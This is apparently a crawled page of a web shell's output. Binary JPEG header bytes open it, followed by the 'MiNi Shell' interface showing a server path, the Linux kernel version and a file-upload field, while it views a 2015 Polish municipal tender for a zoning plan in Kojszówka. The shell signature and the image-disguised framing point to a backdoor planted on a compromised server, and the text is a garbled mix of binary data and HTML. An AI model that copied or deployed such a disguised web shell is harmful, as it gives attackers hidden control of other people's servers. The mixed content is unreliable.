JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150422/56969-N-2015.html

<p class="kh_header"><b>Maków Podhalański: Opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla miejscowości Kojszówka Gmina Maków Podhalański</b><br>
<b>Numer ogłoszenia: 56969 - 2015; data zamieszczenia: 22.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Maków Podhalański , ul. Szpitalna 3, 34-220 Maków Podhalański, woj. małopolskie, tel. 33 874 97 00, faks 33 874 97 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.makow-podhalanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla miejscowości Kojszówka Gmina Maków Podhalański.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie projektu miejscowego planu zagospodarowania przestrzennego dla obszaru obejmującego miejscowości Kojszówka - zgodnie z uchwałą Rady Miejskiej w Makowie Podhalańskim nr XXXVIII/400/2014 z dnia 14 maja 2014 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla obszaru obejmującego miejscowość Kojszówka w Gminie Maków Podhalański wraz z załącznikiem graficznym.
Opis zamówienia:
Obszar wsi Kojszówka - powierzchnia ok. 970 ha
Liczba ludności wsi Kojszówka - 908 mieszkańców
Nowe plany należy sporządzić zgodnie z ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012 r. poz.647 z późn. zm.).
Sporządzone plany winny być zgodne z polityką przestrzenną gminy zawartą w obowiązującym Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy.
Przy sporządzaniu zlecenia należy uwzględnić przepisy rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587).
Wykonawca przed przystąpieniem do przetargu ma złożyć oświadczenie, że zapoznał się z terenem miejscowości Kojszówka.
W ramach zamówienia Wykonawca sporządzi pełną dokumentację planistyczną, w tym między innymi następujące opracowana: 
1) aktualizację opracowania ekofizjograficznego;
2) prognozy oddziaływania na środowisko, z uwzględnieniem ustaleń studium uwarunkowań i   kierunków zagospodarowania przestrzennego gminy;
3) prognozy skutków finansowych uchwalenia planu miejscowego z uwzględnieniem art. 36 ustawy o planowaniu i zagospodarowaniu przestrzennym 
4) uzyskiwanie wszelkich wymaganych przepisami uzgodnień i opinii odnośnie zmian planu.
5) uzyskanie zgody na zmianę przeznaczenia gruntów na cele nierolnicze i nieleśne (jeżeli będzie to wymagane)
6) przeprowadzenie strategicznej oceny oddziaływania na środowisko. 
7) wprowadzanie w projekcie planu zmian wynikających z uzgodnień i rozpatrzonych uwag złożonych po wyłożeniu planu do publicznego wglądu, przygotowanie treści uchwały przyjmującej plan.
Zamówienie obejmuje również:
- obsługę administracyjną, rozumianą jako wykonywanie przez Wykonawcę czynności określonych w art. 17 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012 r. poz. 647 z późn. zm.)
- analizę wniosków do planu, które wpłynęły przed ogłoszeniem i obwieszczeniem o przystąpieniu do sporządzenia planu.
- sprawdzenie zgodności ustaleń planu z istniejącą zabudową (weryfikacja istniejących budynków).
Ponadto od Wykonawcy oczekuje się uczestniczenia w czynnościach proceduralnych: 
a)udzielanie informacji  zainteresowanym stronom w trakcie wyłożenia projektu planu,
b)uczestniczenie w dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu,
c)udział na posiedzeniach Rady Miejskiej w Makowie Podhalańskim. 
Załączniki graficzne przedmiotu zamówienia (rysunki planów i schematy rozwiązań z zakresu pełnej infrastruktury technicznej) należy wykonać techniką komputerową. Zakłada się sporządzenie rysunków planów w skali 1:2000 oraz w pomniejszeniu 1:5000 - w tradycyjnej formie rysunkowej i w formie elektronicznej. Koszt niezbędnych podkładów mapowych leży po stronie Wykonawcy.
Wykonawca winien przekazać Zamawiającemu opracowanie końcowe w następującym zakresie oraz formie:
a)rysunek planu w kolorze - 3 egzemplarze
b)ustalenia planu w formie tradycyjnej - 1 egzemplarz
c)prognoza oddziaływania na środowisko - 1 egzemplarz
d)prognoza skutków finansowych planu - 1 egzemplarz
e)materiały do zmiany przeznaczenia gruntów rolnych na cele nierolnicze i nieleśne - 1 egz.
f)materiały formalno-prawne - 3 egzemplarze
g)treść uchwał wraz ze wszystkimi załącznikami w wersji cyfrowej - 3 komplety (płyty CD/DVD) zawierające:
-tekst w plikach o rozszerzeniu *.doc  i *.pdf oraz w edytorze aktów prawnych
-część graficzna w 3 formatach:
1)rastrowej: w plikach o rozszerzeniu .jpg i .tiff w rozdzielczości nie mniejszej niż 600DPI
2)wektorowej, współpracującej z programem EWMAPA w wersji nie niższej niż 11
3)pdf,
Treść uchwał - tekst wraz z częścią graficzną - w edytorze aktów prawnych - w celu przekazania do publikacji w Dzienniku Urzędowym Województwa Małopolskiego.
GWARANCJA:
a)Wykonawca jest zobowiązany do udzielenia minimum 36 miesięcy gwarancji na wykonane prace.
b)Bieg terminu gwarancji rozpoczyna się od momentu podpisania protokołu przyjęcia całości prac objętych zamówieniem, w tym dostarczenia opracowania w postaci papierowej i cyfrowej. 
c)Termin realizacji poprawek gwarancyjnych: 2 tygodnie od zgłoszenia przez Zamawiającego.
d)Zamawiający traktuje wersję papierową jako nadrzędną
e)W czasie trwania gwarancji Wykonawca zobowiązuje się usunąć wszelkie wykazane przez Zamawiającego niezgodności lub rozbieżności nie wykryte w trakcie odbioru przedmiotu umowy, obejmujące w szczególności: 
- różnice pomiędzy zapisami w tekście planu a jego postacią graficzną,
- wszelkie ustalenia w tekście planu i jego postaci graficznej niezgodne ze przepisami prawa, 
- wszelkie różnice pomiędzy wersją papierową a cyfrową - zarówno w rysunku planu, danych  opisowych jak i w tabelach Przeznaczenie-Ustalenia,
- wszelkie niezgodności z podanymi warunkami technicznymi.
Wykonawca nie będzie pobierał żadnych dodatkowych opłat za prace realizowane w ramach gwarancji (łącznie z kosztami dojazdu, delegacji, noclegów itp).
Prace  należy  wykonać w 5 fazach uwzględniających  poszczególne etapy przygotowania  projektu planu, określone art. 17  ust.2  ustawy.
FAZA I obejmująca :
1.czynności wstępne (zebranie i analiza kompletności materiałów wyjściowych pod względem  merytorycznym i formalno-prawnym).
2.inwentaryzacja  urbanistyczna
3.analiza  materiałów wyjściowych.
4.czynności formalno-prawne związane z ogłoszeniem o przystąpieniu do sporządzenia planu- rozpatrzenie  wniosków.
5.przekazanie Burmistrzowi Makowa Podhalańskiego projektu rozpatrzenia wniosków złożonych do projektu planu.FAZA II  obejmująca:
1.sporządzenie  projektu planu (część tekstowa i graficzna)
2.sporządzenie prognozy oddziaływania na środowisko
3.opracowanie prognozy skutków finansowych
4.opiniowanie i uzgadnianie projektu planu z właściwymi organami
5.wprowadzenie korekt
FAZA  III obejmująca:
1.rozpoczęcie wyłożenia projektu do publicznego wglądu wraz z prognozą oddziaływania na środowisko.
2.rozpatrzenie uwag złożonych w trakcie wyłożenia planu miejscowego do publicznego wglądu.
3.przekazanie Burmistrzowi projektu rozpatrzenia uwag złożonych do zmiany planu w trakcie wyłożenia projektu planu do publicznego wglądu.
4.wprowadzenie ewentualnych zmian do projektu w wyniku rozpatrzenia uwag.
FAZA IV obejmująca:
1.przygotowanie elaboratu planu w celu jego uchwalenia na sesji Rady Miejskiej.
2.przygotowanie dokumentacji formalno-prawnej
FAZA V obejmująca:
1.sprawdzenie i zatwierdzenie przez Wojewodę dokumentacji formalno-prawnej i opublikowanie jej w Dzienniku Urzędowym.
Wynagrodzenie będzie płatne częściowo za wykonane poszczególne fazy:
Za fazę I i II - 30 %;                       
Za fazę III - 20 %;                       
Po wykonaniu fazy IV - 30 %
Po wykonaniu fazy V  - 20 %.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 71.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.Ustala się wadium dla całości przedmiotu zamówienia: w kwocie 2 000,00 złotych (słownie: dwa tysiące złotych 00/100) w formie przewidzianej zgodnie z art. 45 ust.6 ustawy Prawo zamówień publicznych. 
Okres ważności wadium musi obejmować cały okres związania ofertą. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego, przed upływem terminu składania ofert. Nr rachunku bankowego:
Bank Spółdzielczy Jordanów oddział w Makowie Podhalańskim
75 8799 0001 0010 0100 0114 0002
Tytuł wpłaty:Wadium postępowaniu o zamówienie publiczne nr ZP.PN.9.2015.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Zamawiający uzna oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych (wg. zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku Zamawiający żąda: wykaz wykonanych prac z opracowania dokumentacji z zakresu planowania przestrzennego wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, powierzchni, daty i miejsca wykonania oraz załączeniem dowodów potwierdzających, że  prace te zostały wykonane z należytą starannością oraz wskazujących, czy zostały wykonane zgodnie z zasadami i prawidłowo ukończone - Zamawiający wymaga 2 opracowania w zakresie dokumentacji miejscowego planu zagospodarowania przestrzennego o wartości min. 45 000 złotych brutto każda i o powierzchni min. 1 000 ha każda (wg. zał. nr 4 do SIWZ). 
         Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania niniejszego zamówienia a podmiot udostępniający swoje zasoby będzie dla przedmiotowego postępowania podwykonawcą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Zamawiający żąda: wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnego do wykonania zamówienia a także zakresu wykonywanych przez nich czynności (wg. własnego wzoru).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia tego warunku Zamawiający wymaga: oświadczenie Wykonawcy, o wpisaniu głównego projektanta opracowania dokumentacji na listę członków właściwej izby samorządu zawodowego (wg. zał. nr 5 do SIWZ). 
Projektant opracowania, który nie jest pracownikiem Wykonawcy, powinien mieć udokumentowany stosunek prawny z Wykonawcą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku Zamawiający żąda: opłaconej polisy w zakresie niezbędnym do wykazania, że Wykonawca znajduje się w dobrej sytuacji ekonomicznej i finansowej a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Zamawiający wymaga przedstawienia dokumentu świadczącego o ubezpieczeniu od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 100 000,00 złotych (słownie: sto tysięcy złotych) - kopia dokumentu .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. W przypadku korzystania z zasobów innych podmiotów, w celu wykazania spełniania warunków udziału w postępowaniu, zasobów innego podmiotu, Wykonawca zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia zgodnie z treścią art. 26 ust. 2b ustawy Zamawiający żąda:
oświadczenia o braku podstaw do wykluczenia
aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy. W przypadku Wykonawców prowadzących działalność gospodarczą w oparciu o wpis do CEIDG wymagane jest załączenie wydruku z CEIDG.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy z Wykonawcą w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach:
a.wynagrodzenie umowne brutto może ulec odpowiedniej zmianie w przypadku zmiany powszechnie obowiązujących przepisów podatku VAT.
b.zmiana terminu płatności, wynikająca z wszelkich zmian wprowadzonych przez strony do umowy.
c.w innych uzasadnionych okolicznościach, których nie można było przewidzieć w chwili zawarcia umowy.
Zmiana postanowień umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.makow-podhalanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Makowie Podhalańskim, 34-220 Maków Podhalański ul. Szpitalna 3 - Biuro Obsługi Klienta (parter budynku) oraz na stronie internetowej Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2015 godzina 09:00, miejsce: Urząd Miejski w Makowie Podhalańskim, 34-220 Maków Podhalański ul. Szpitalna 3 - Biuro Obsługi Klienta (parter budynku)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com